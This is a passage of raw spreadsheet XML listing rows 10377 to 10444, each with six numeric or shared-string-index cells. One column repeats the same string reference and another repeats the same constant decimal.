        <v>9930</v>
      </c>
      <c r="D10377" s="2">
        <v>1.0</v>
      </c>
      <c r="E10377" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10377" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10378" ht="15.75" customHeight="1">
      <c r="A10378" s="1">
        <v>377.0</v>
      </c>
      <c r="B10378" s="2">
        <v>1.6329069E7</v>
      </c>
      <c r="C10378" s="2" t="s">
        <v>9931</v>
      </c>
      <c r="D10378" s="2">
        <v>1.0</v>
      </c>
      <c r="E10378" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10378" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10379" ht="15.75" customHeight="1">
      <c r="A10379" s="1">
        <v>465.0</v>
      </c>
      <c r="B10379" s="2">
        <v>1.7308341E7</v>
      </c>
      <c r="C10379" s="2" t="s">
        <v>9932</v>
      </c>
      <c r="D10379" s="2">
        <v>1.0</v>
      </c>
      <c r="E10379" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10379" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10380" ht="15.75" customHeight="1">
      <c r="A10380" s="1">
        <v>492.0</v>
      </c>
      <c r="B10380" s="2">
        <v>1.763231E7</v>
      </c>
      <c r="C10380" s="2" t="s">
        <v>9933</v>
      </c>
      <c r="D10380" s="2">
        <v>1.0</v>
      </c>
      <c r="E10380" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10380" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10381" ht="15.75" customHeight="1">
      <c r="A10381" s="1">
        <v>520.0</v>
      </c>
      <c r="B10381" s="2">
        <v>1.8263186E7</v>
      </c>
      <c r="C10381" s="2" t="s">
        <v>9934</v>
      </c>
      <c r="D10381" s="2">
        <v>1.0</v>
      </c>
      <c r="E10381" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10381" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10382" ht="15.75" customHeight="1">
      <c r="A10382" s="1">
        <v>527.0</v>
      </c>
      <c r="B10382" s="2">
        <v>1.8410159E7</v>
      </c>
      <c r="C10382" s="2" t="s">
        <v>9935</v>
      </c>
      <c r="D10382" s="2">
        <v>1.0</v>
      </c>
      <c r="E10382" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10382" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10383" ht="15.75" customHeight="1">
      <c r="A10383" s="1">
        <v>766.0</v>
      </c>
      <c r="B10383" s="2">
        <v>2.1055973E7</v>
      </c>
      <c r="C10383" s="2" t="s">
        <v>9936</v>
      </c>
      <c r="D10383" s="2">
        <v>1.0</v>
      </c>
      <c r="E10383" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10383" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10384" ht="15.75" customHeight="1">
      <c r="A10384" s="1">
        <v>914.0</v>
      </c>
      <c r="B10384" s="2">
        <v>2.2211358E7</v>
      </c>
      <c r="C10384" s="2" t="s">
        <v>9937</v>
      </c>
      <c r="D10384" s="2">
        <v>1.0</v>
      </c>
      <c r="E10384" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10384" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10385" ht="15.75" customHeight="1">
      <c r="A10385" s="1">
        <v>934.0</v>
      </c>
      <c r="B10385" s="2">
        <v>2.2384603E7</v>
      </c>
      <c r="C10385" s="2" t="s">
        <v>9938</v>
      </c>
      <c r="D10385" s="2">
        <v>1.0</v>
      </c>
      <c r="E10385" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10385" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10386" ht="15.75" customHeight="1">
      <c r="A10386" s="1">
        <v>1184.0</v>
      </c>
      <c r="B10386" s="2">
        <v>2.4669494E7</v>
      </c>
      <c r="C10386" s="2" t="s">
        <v>9939</v>
      </c>
      <c r="D10386" s="2">
        <v>1.0</v>
      </c>
      <c r="E10386" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10386" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10387" ht="15.75" customHeight="1">
      <c r="A10387" s="1">
        <v>1347.0</v>
      </c>
      <c r="B10387" s="2">
        <v>2.5925494E7</v>
      </c>
      <c r="C10387" s="2" t="s">
        <v>9940</v>
      </c>
      <c r="D10387" s="2">
        <v>1.0</v>
      </c>
      <c r="E10387" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10387" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10388" ht="15.75" customHeight="1">
      <c r="A10388" s="1">
        <v>1381.0</v>
      </c>
      <c r="B10388" s="2">
        <v>2.6093689E7</v>
      </c>
      <c r="C10388" s="2" t="s">
        <v>9941</v>
      </c>
      <c r="D10388" s="2">
        <v>1.0</v>
      </c>
      <c r="E10388" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10388" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10389" ht="15.75" customHeight="1">
      <c r="A10389" s="1">
        <v>1382.0</v>
      </c>
      <c r="B10389" s="2">
        <v>2.6122855E7</v>
      </c>
      <c r="C10389" s="2" t="s">
        <v>9942</v>
      </c>
      <c r="D10389" s="2">
        <v>1.0</v>
      </c>
      <c r="E10389" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10389" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10390" ht="15.75" customHeight="1">
      <c r="A10390" s="1">
        <v>1403.0</v>
      </c>
      <c r="B10390" s="2">
        <v>2.63047E7</v>
      </c>
      <c r="C10390" s="2" t="s">
        <v>9943</v>
      </c>
      <c r="D10390" s="2">
        <v>1.0</v>
      </c>
      <c r="E10390" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10390" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10391" ht="15.75" customHeight="1">
      <c r="A10391" s="1">
        <v>1592.0</v>
      </c>
      <c r="B10391" s="2">
        <v>2.7746523E7</v>
      </c>
      <c r="C10391" s="2" t="s">
        <v>9944</v>
      </c>
      <c r="D10391" s="2">
        <v>1.0</v>
      </c>
      <c r="E10391" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10391" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10392" ht="15.75" customHeight="1">
      <c r="A10392" s="1">
        <v>1797.0</v>
      </c>
      <c r="B10392" s="2">
        <v>2.9134786E7</v>
      </c>
      <c r="C10392" s="2" t="s">
        <v>9945</v>
      </c>
      <c r="D10392" s="2">
        <v>1.0</v>
      </c>
      <c r="E10392" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10392" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10393" ht="15.75" customHeight="1">
      <c r="A10393" s="1">
        <v>2065.0</v>
      </c>
      <c r="B10393" s="2">
        <v>3.1069498E7</v>
      </c>
      <c r="C10393" s="2" t="s">
        <v>9946</v>
      </c>
      <c r="D10393" s="2">
        <v>1.0</v>
      </c>
      <c r="E10393" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10393" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10394" ht="15.75" customHeight="1">
      <c r="A10394" s="1">
        <v>2117.0</v>
      </c>
      <c r="B10394" s="2">
        <v>3.1376222E7</v>
      </c>
      <c r="C10394" s="2" t="s">
        <v>9947</v>
      </c>
      <c r="D10394" s="2">
        <v>1.0</v>
      </c>
      <c r="E10394" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10394" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10395" ht="15.75" customHeight="1">
      <c r="A10395" s="1">
        <v>2240.0</v>
      </c>
      <c r="B10395" s="2">
        <v>3.230572E7</v>
      </c>
      <c r="C10395" s="2" t="s">
        <v>9948</v>
      </c>
      <c r="D10395" s="2">
        <v>1.0</v>
      </c>
      <c r="E10395" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10395" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10396" ht="15.75" customHeight="1">
      <c r="A10396" s="1">
        <v>2244.0</v>
      </c>
      <c r="B10396" s="2">
        <v>3.2327512E7</v>
      </c>
      <c r="C10396" s="2" t="s">
        <v>9949</v>
      </c>
      <c r="D10396" s="2">
        <v>1.0</v>
      </c>
      <c r="E10396" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10396" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10397" ht="15.75" customHeight="1">
      <c r="A10397" s="1">
        <v>2310.0</v>
      </c>
      <c r="B10397" s="2">
        <v>3.2828332E7</v>
      </c>
      <c r="C10397" s="2" t="s">
        <v>9950</v>
      </c>
      <c r="D10397" s="2">
        <v>1.0</v>
      </c>
      <c r="E10397" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10397" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10398" ht="15.75" customHeight="1">
      <c r="A10398" s="1">
        <v>2323.0</v>
      </c>
      <c r="B10398" s="2">
        <v>3.2893959E7</v>
      </c>
      <c r="C10398" s="2" t="s">
        <v>9951</v>
      </c>
      <c r="D10398" s="2">
        <v>1.0</v>
      </c>
      <c r="E10398" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10398" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10399" ht="15.75" customHeight="1">
      <c r="A10399" s="1">
        <v>2452.0</v>
      </c>
      <c r="B10399" s="2">
        <v>3.3715641E7</v>
      </c>
      <c r="C10399" s="2" t="s">
        <v>9952</v>
      </c>
      <c r="D10399" s="2">
        <v>1.0</v>
      </c>
      <c r="E10399" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10399" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10400" ht="15.75" customHeight="1">
      <c r="A10400" s="1">
        <v>2584.0</v>
      </c>
      <c r="B10400" s="2">
        <v>3.4322126E7</v>
      </c>
      <c r="C10400" s="2" t="s">
        <v>9953</v>
      </c>
      <c r="D10400" s="2">
        <v>1.0</v>
      </c>
      <c r="E10400" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10400" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10401" ht="15.75" customHeight="1">
      <c r="A10401" s="1">
        <v>2687.0</v>
      </c>
      <c r="B10401" s="2">
        <v>3.4811654E7</v>
      </c>
      <c r="C10401" s="2" t="s">
        <v>9954</v>
      </c>
      <c r="D10401" s="2">
        <v>1.0</v>
      </c>
      <c r="E10401" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10401" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10402" ht="15.75" customHeight="1">
      <c r="A10402" s="1">
        <v>2688.0</v>
      </c>
      <c r="B10402" s="2">
        <v>3.4811654E7</v>
      </c>
      <c r="C10402" s="2" t="s">
        <v>9955</v>
      </c>
      <c r="D10402" s="2">
        <v>1.0</v>
      </c>
      <c r="E10402" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10402" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10403" ht="15.75" customHeight="1">
      <c r="A10403" s="1">
        <v>2811.0</v>
      </c>
      <c r="B10403" s="2">
        <v>3.5367503E7</v>
      </c>
      <c r="C10403" s="2" t="s">
        <v>9956</v>
      </c>
      <c r="D10403" s="2">
        <v>1.0</v>
      </c>
      <c r="E10403" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10403" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10404" ht="15.75" customHeight="1">
      <c r="A10404" s="1">
        <v>3147.0</v>
      </c>
      <c r="B10404" s="2">
        <v>3.6969348E7</v>
      </c>
      <c r="C10404" s="2" t="s">
        <v>9957</v>
      </c>
      <c r="D10404" s="2">
        <v>1.0</v>
      </c>
      <c r="E10404" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10404" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10405" ht="15.75" customHeight="1">
      <c r="A10405" s="1">
        <v>3184.0</v>
      </c>
      <c r="B10405" s="2">
        <v>3.7155622E7</v>
      </c>
      <c r="C10405" s="2" t="s">
        <v>9958</v>
      </c>
      <c r="D10405" s="2">
        <v>1.0</v>
      </c>
      <c r="E10405" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10405" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10406" ht="15.75" customHeight="1">
      <c r="A10406" s="1">
        <v>3192.0</v>
      </c>
      <c r="B10406" s="2">
        <v>3.7227048E7</v>
      </c>
      <c r="C10406" s="2" t="s">
        <v>9959</v>
      </c>
      <c r="D10406" s="2">
        <v>1.0</v>
      </c>
      <c r="E10406" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10406" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10407" ht="15.75" customHeight="1">
      <c r="A10407" s="1">
        <v>3338.0</v>
      </c>
      <c r="B10407" s="2">
        <v>3.7708925E7</v>
      </c>
      <c r="C10407" s="2" t="s">
        <v>9960</v>
      </c>
      <c r="D10407" s="2">
        <v>1.0</v>
      </c>
      <c r="E10407" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10407" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10408" ht="15.75" customHeight="1">
      <c r="A10408" s="1">
        <v>3370.0</v>
      </c>
      <c r="B10408" s="2">
        <v>3.7906557E7</v>
      </c>
      <c r="C10408" s="2" t="s">
        <v>9961</v>
      </c>
      <c r="D10408" s="2">
        <v>1.0</v>
      </c>
      <c r="E10408" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10408" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10409" ht="15.75" customHeight="1">
      <c r="A10409" s="1">
        <v>3457.0</v>
      </c>
      <c r="B10409" s="2">
        <v>3.828309E7</v>
      </c>
      <c r="C10409" s="2" t="s">
        <v>9962</v>
      </c>
      <c r="D10409" s="2">
        <v>1.0</v>
      </c>
      <c r="E10409" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10409" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10410" ht="15.75" customHeight="1">
      <c r="A10410" s="1">
        <v>3611.0</v>
      </c>
      <c r="B10410" s="2">
        <v>3.9140653E7</v>
      </c>
      <c r="C10410" s="2" t="s">
        <v>9963</v>
      </c>
      <c r="D10410" s="2">
        <v>1.0</v>
      </c>
      <c r="E10410" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10410" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10411" ht="15.75" customHeight="1">
      <c r="A10411" s="1">
        <v>3669.0</v>
      </c>
      <c r="B10411" s="2">
        <v>3.9416144E7</v>
      </c>
      <c r="C10411" s="2" t="s">
        <v>9964</v>
      </c>
      <c r="D10411" s="2">
        <v>1.0</v>
      </c>
      <c r="E10411" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10411" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10412" ht="15.75" customHeight="1">
      <c r="A10412" s="1">
        <v>3786.0</v>
      </c>
      <c r="B10412" s="2">
        <v>3.9925083E7</v>
      </c>
      <c r="C10412" s="2" t="s">
        <v>9965</v>
      </c>
      <c r="D10412" s="2">
        <v>1.0</v>
      </c>
      <c r="E10412" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10412" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10413" ht="15.75" customHeight="1">
      <c r="A10413" s="1">
        <v>4021.0</v>
      </c>
      <c r="B10413" s="2">
        <v>4.0951658E7</v>
      </c>
      <c r="C10413" s="2" t="s">
        <v>9966</v>
      </c>
      <c r="D10413" s="2">
        <v>1.0</v>
      </c>
      <c r="E10413" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10413" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10414" ht="15.75" customHeight="1">
      <c r="A10414" s="1">
        <v>4031.0</v>
      </c>
      <c r="B10414" s="2">
        <v>4.1008751E7</v>
      </c>
      <c r="C10414" s="2" t="s">
        <v>9967</v>
      </c>
      <c r="D10414" s="2">
        <v>1.0</v>
      </c>
      <c r="E10414" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10414" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10415" ht="15.75" customHeight="1">
      <c r="A10415" s="1">
        <v>4086.0</v>
      </c>
      <c r="B10415" s="2">
        <v>4.1203305E7</v>
      </c>
      <c r="C10415" s="2" t="s">
        <v>9968</v>
      </c>
      <c r="D10415" s="2">
        <v>1.0</v>
      </c>
      <c r="E10415" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10415" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10416" ht="15.75" customHeight="1">
      <c r="A10416" s="1">
        <v>4357.0</v>
      </c>
      <c r="B10416" s="2">
        <v>4.2092767E7</v>
      </c>
      <c r="C10416" s="2" t="s">
        <v>9969</v>
      </c>
      <c r="D10416" s="2">
        <v>1.0</v>
      </c>
      <c r="E10416" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10416" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10417" ht="15.75" customHeight="1">
      <c r="A10417" s="1">
        <v>4435.0</v>
      </c>
      <c r="B10417" s="2">
        <v>4.2351597E7</v>
      </c>
      <c r="C10417" s="2" t="s">
        <v>9970</v>
      </c>
      <c r="D10417" s="2">
        <v>1.0</v>
      </c>
      <c r="E10417" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10417" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10418" ht="15.75" customHeight="1">
      <c r="A10418" s="1">
        <v>4513.0</v>
      </c>
      <c r="B10418" s="2">
        <v>4.2601674E7</v>
      </c>
      <c r="C10418" s="2" t="s">
        <v>9971</v>
      </c>
      <c r="D10418" s="2">
        <v>1.0</v>
      </c>
      <c r="E10418" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10418" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10419" ht="15.75" customHeight="1">
      <c r="A10419" s="1">
        <v>4655.0</v>
      </c>
      <c r="B10419" s="2">
        <v>4.3106949E7</v>
      </c>
      <c r="C10419" s="2" t="s">
        <v>9972</v>
      </c>
      <c r="D10419" s="2">
        <v>1.0</v>
      </c>
      <c r="E10419" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10419" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10420" ht="15.75" customHeight="1">
      <c r="A10420" s="1">
        <v>4709.0</v>
      </c>
      <c r="B10420" s="2">
        <v>4.3260444E7</v>
      </c>
      <c r="C10420" s="2" t="s">
        <v>9973</v>
      </c>
      <c r="D10420" s="2">
        <v>1.0</v>
      </c>
      <c r="E10420" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10420" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10421" ht="15.75" customHeight="1">
      <c r="A10421" s="1">
        <v>4858.0</v>
      </c>
      <c r="B10421" s="2">
        <v>4.3782674E7</v>
      </c>
      <c r="C10421" s="2" t="s">
        <v>9974</v>
      </c>
      <c r="D10421" s="2">
        <v>1.0</v>
      </c>
      <c r="E10421" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10421" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10422" ht="15.75" customHeight="1">
      <c r="A10422" s="1">
        <v>4907.0</v>
      </c>
      <c r="B10422" s="2">
        <v>4.3921211E7</v>
      </c>
      <c r="C10422" s="2" t="s">
        <v>9975</v>
      </c>
      <c r="D10422" s="2">
        <v>1.0</v>
      </c>
      <c r="E10422" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10422" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10423" ht="15.75" customHeight="1">
      <c r="A10423" s="1">
        <v>4967.0</v>
      </c>
      <c r="B10423" s="2">
        <v>4.4088125E7</v>
      </c>
      <c r="C10423" s="2" t="s">
        <v>9976</v>
      </c>
      <c r="D10423" s="2">
        <v>1.0</v>
      </c>
      <c r="E10423" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10423" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10424" ht="15.75" customHeight="1">
      <c r="A10424" s="1">
        <v>5251.0</v>
      </c>
      <c r="B10424" s="2">
        <v>4.5090308E7</v>
      </c>
      <c r="C10424" s="2" t="s">
        <v>9977</v>
      </c>
      <c r="D10424" s="2">
        <v>1.0</v>
      </c>
      <c r="E10424" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10424" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10425" ht="15.75" customHeight="1">
      <c r="A10425" s="1">
        <v>5316.0</v>
      </c>
      <c r="B10425" s="2">
        <v>4.5279096E7</v>
      </c>
      <c r="C10425" s="2" t="s">
        <v>9978</v>
      </c>
      <c r="D10425" s="2">
        <v>1.0</v>
      </c>
      <c r="E10425" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10425" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10426" ht="15.75" customHeight="1">
      <c r="A10426" s="1">
        <v>5536.0</v>
      </c>
      <c r="B10426" s="2">
        <v>4.5903613E7</v>
      </c>
      <c r="C10426" s="2" t="s">
        <v>9979</v>
      </c>
      <c r="D10426" s="2">
        <v>1.0</v>
      </c>
      <c r="E10426" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10426" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10427" ht="15.75" customHeight="1">
      <c r="A10427" s="1">
        <v>5614.0</v>
      </c>
      <c r="B10427" s="2">
        <v>4.6174307E7</v>
      </c>
      <c r="C10427" s="2" t="s">
        <v>9980</v>
      </c>
      <c r="D10427" s="2">
        <v>1.0</v>
      </c>
      <c r="E10427" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10427" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10428" ht="15.75" customHeight="1">
      <c r="A10428" s="1">
        <v>5926.0</v>
      </c>
      <c r="B10428" s="2">
        <v>4.7232323E7</v>
      </c>
      <c r="C10428" s="2" t="s">
        <v>9981</v>
      </c>
      <c r="D10428" s="2">
        <v>1.0</v>
      </c>
      <c r="E10428" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10428" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10429" ht="15.75" customHeight="1">
      <c r="A10429" s="1">
        <v>6075.0</v>
      </c>
      <c r="B10429" s="2">
        <v>4.7643597E7</v>
      </c>
      <c r="C10429" s="2" t="s">
        <v>9982</v>
      </c>
      <c r="D10429" s="2">
        <v>1.0</v>
      </c>
      <c r="E10429" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10429" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10430" ht="15.75" customHeight="1">
      <c r="A10430" s="1">
        <v>6231.0</v>
      </c>
      <c r="B10430" s="2">
        <v>4.8063246E7</v>
      </c>
      <c r="C10430" s="2" t="s">
        <v>9983</v>
      </c>
      <c r="D10430" s="2">
        <v>1.0</v>
      </c>
      <c r="E10430" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10430" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10431" ht="15.75" customHeight="1">
      <c r="A10431" s="1">
        <v>6443.0</v>
      </c>
      <c r="B10431" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C10431" s="2" t="s">
        <v>9984</v>
      </c>
      <c r="D10431" s="2">
        <v>1.0</v>
      </c>
      <c r="E10431" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10431" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10432" ht="15.75" customHeight="1">
      <c r="A10432" s="1">
        <v>6587.0</v>
      </c>
      <c r="B10432" s="2">
        <v>4.897141E7</v>
      </c>
      <c r="C10432" s="2" t="s">
        <v>9985</v>
      </c>
      <c r="D10432" s="2">
        <v>1.0</v>
      </c>
      <c r="E10432" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10432" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10433" ht="15.75" customHeight="1">
      <c r="A10433" s="1">
        <v>6608.0</v>
      </c>
      <c r="B10433" s="2">
        <v>4.9016981E7</v>
      </c>
      <c r="C10433" s="2" t="s">
        <v>9986</v>
      </c>
      <c r="D10433" s="2">
        <v>1.0</v>
      </c>
      <c r="E10433" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10433" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10434" ht="15.75" customHeight="1">
      <c r="A10434" s="1">
        <v>6646.0</v>
      </c>
      <c r="B10434" s="2">
        <v>4.9083939E7</v>
      </c>
      <c r="C10434" s="2" t="s">
        <v>9987</v>
      </c>
      <c r="D10434" s="2">
        <v>1.0</v>
      </c>
      <c r="E10434" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10434" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10435" ht="15.75" customHeight="1">
      <c r="A10435" s="1">
        <v>6668.0</v>
      </c>
      <c r="B10435" s="2">
        <v>4.9119236E7</v>
      </c>
      <c r="C10435" s="2" t="s">
        <v>9988</v>
      </c>
      <c r="D10435" s="2">
        <v>1.0</v>
      </c>
      <c r="E10435" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10435" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10436" ht="15.75" customHeight="1">
      <c r="A10436" s="1">
        <v>6788.0</v>
      </c>
      <c r="B10436" s="2">
        <v>4.9500231E7</v>
      </c>
      <c r="C10436" s="2" t="s">
        <v>9989</v>
      </c>
      <c r="D10436" s="2">
        <v>1.0</v>
      </c>
      <c r="E10436" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10436" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10437" ht="15.75" customHeight="1">
      <c r="A10437" s="1">
        <v>6939.0</v>
      </c>
      <c r="B10437" s="2">
        <v>4.9911512E7</v>
      </c>
      <c r="C10437" s="2" t="s">
        <v>9990</v>
      </c>
      <c r="D10437" s="2">
        <v>1.0</v>
      </c>
      <c r="E10437" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10437" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10438" ht="15.75" customHeight="1">
      <c r="A10438" s="1">
        <v>7002.0</v>
      </c>
      <c r="B10438" s="2">
        <v>5.0082601E7</v>
      </c>
      <c r="C10438" s="2" t="s">
        <v>9991</v>
      </c>
      <c r="D10438" s="2">
        <v>1.0</v>
      </c>
      <c r="E10438" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10438" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10439" ht="15.75" customHeight="1">
      <c r="A10439" s="1">
        <v>7197.0</v>
      </c>
      <c r="B10439" s="2">
        <v>5.0589254E7</v>
      </c>
      <c r="C10439" s="2" t="s">
        <v>9992</v>
      </c>
      <c r="D10439" s="2">
        <v>1.0</v>
      </c>
      <c r="E10439" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10439" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10440" ht="15.75" customHeight="1">
      <c r="A10440" s="1">
        <v>7202.0</v>
      </c>
      <c r="B10440" s="2">
        <v>5.0594248E7</v>
      </c>
      <c r="C10440" s="2" t="s">
        <v>9993</v>
      </c>
      <c r="D10440" s="2">
        <v>1.0</v>
      </c>
      <c r="E10440" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10440" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10441" ht="15.75" customHeight="1">
      <c r="A10441" s="1">
        <v>7283.0</v>
      </c>
      <c r="B10441" s="2">
        <v>5.0792699E7</v>
      </c>
      <c r="C10441" s="2" t="s">
        <v>9994</v>
      </c>
      <c r="D10441" s="2">
        <v>1.0</v>
      </c>
      <c r="E10441" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10441" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10442" ht="15.75" customHeight="1">
      <c r="A10442" s="1">
        <v>7572.0</v>
      </c>
      <c r="B10442" s="2">
        <v>5.1560396E7</v>
      </c>
      <c r="C10442" s="2" t="s">
        <v>9995</v>
      </c>
      <c r="D10442" s="2">
        <v>1.0</v>
      </c>
      <c r="E10442" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10442" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10443" ht="15.75" customHeight="1">
      <c r="A10443" s="1">
        <v>7778.0</v>
      </c>
      <c r="B10443" s="2">
        <v>5.2174409E7</v>
      </c>
      <c r="C10443" s="2" t="s">
        <v>9996</v>
      </c>
      <c r="D10443" s="2">
        <v>1.0</v>
      </c>
      <c r="E10443" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10443" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10444" ht="15.75" customHeight="1">
      <c r="A10444" s="1">
        <v>7796.0</v>
      </c>
      <c r="B10444" s="2">
        <v>5.220815E7</v>
      </c>
      <c r="C10444" s="2" t="s">
